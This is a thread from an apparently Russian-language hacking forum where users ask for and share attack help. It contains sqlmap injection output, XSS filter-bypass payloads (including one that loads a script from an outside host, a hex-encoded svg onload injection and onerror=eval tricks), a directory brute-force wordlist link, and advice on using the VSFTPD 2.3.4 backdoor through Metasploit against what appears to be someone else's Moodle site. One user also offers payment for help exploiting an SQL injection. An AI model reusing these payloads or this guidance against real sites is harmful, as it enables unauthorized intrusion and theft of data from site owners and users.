Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
  2. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    [01:38:29] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5 (MariaDB fork)
    [01:38:29] [INFO] fetching database names
    [01:38:29] [INFO] fetching number of databases
    [01:38:30] [INFO] resumed: ЩЩ
    [01:38:30] [ERROR] unable to retrieve the number of databases
    [01:38:30] [INFO] falling back to current database
    [01:38:30] [INFO] fetching current database
    [01:38:30] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files
    [01:38:30] [INFO] resumed: `к?
    available databases [1]:
    [*] `к?
    Как с этим бороться?
     
  3. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    --hex по пробуй
     
  4. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Пробовал,тамперы перепробовал
     
  5. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    А чем можно заменить ()в

    <script>alert(1)</script>
     
  6. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    пробуй alert`aaa`
    вот тебе пример https://forum.antichat.ru/threads/424991/page-17

    но если отработает такая штука, то алерт не нужен
    <script src=//lala.com/lala.js>
     
  7. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Не выходя из <script>нужно выполнить xss без ;()
     
  8. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Charencode helps bypass "The URI you submitted has disallowed characters.", but the vector fails.:(
     
  9. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Code:
    document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//
    
     
    Octavian likes this.
  10. Bo0oM

    Bo0oM Member

    Joined:
    26 Dec 2009
    Messages:
    2
    Likes Received:
    35
    Reputations:
    21
    Code:
    onerror=eval;throw'=alert\x281\x29'
    Больше нравится (с предварительной записью в window.name, который передается в рамках одного окна)

    Code:
    onerror=eval;throw window.name
     
    Octavian likes this.
  11. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их
     
  12. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    миллиона тебе достаточно? много не всегда есть хорошо
    Code:
    https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt
     
    #2692 Baskin-Robbins, 8 Sep 2019
    Last edited: 8 Sep 2019
    seostock and Octavian like this.
  13. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  14. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
  15. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)
     
  16. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Какой модуль msf вы используете? Сам сайт крyтится на moodle, а FTP порт скорее всего открыт хостером.
     
  17. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    VSFTPD v2.3.4
     
  18. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Бэкдор то была всего несколько дней, не факт что она там есть, либо хостеру совсем уж пох..
     
  19. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Если присутствует, то как возможно раскрутить?
     
  20. pacojaveh

    pacojaveh New Member

    Joined:
    14 Sep 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Всем привет,помогите пожалуйста ситуация такая:
    Appspider(Rapid7) находит sql уязвимость "Double-float overflow" отправляя значение "1e309" как данные POST запросом,в ответе Mysql2::Error: Unknown column 'Infinity' in 'field list': INSERT INTO `interactions` (`accept_langs`, `browser`, `browser_version`....перечисление всех колонок) при ЛЮБЫХ других значениях кроме "1e309(и выше 1e310..)" ошибки НЕТ,sqlmap не может раскрутить ее,пробовал фазерам через owasp большим списком также ошибок других не нашлось реакция только на 1e309.
    И из всего этого вопрос как ее раскрутить в sqlmap?готов оплатить за помощь если кто знает как решить,моя телега @S920799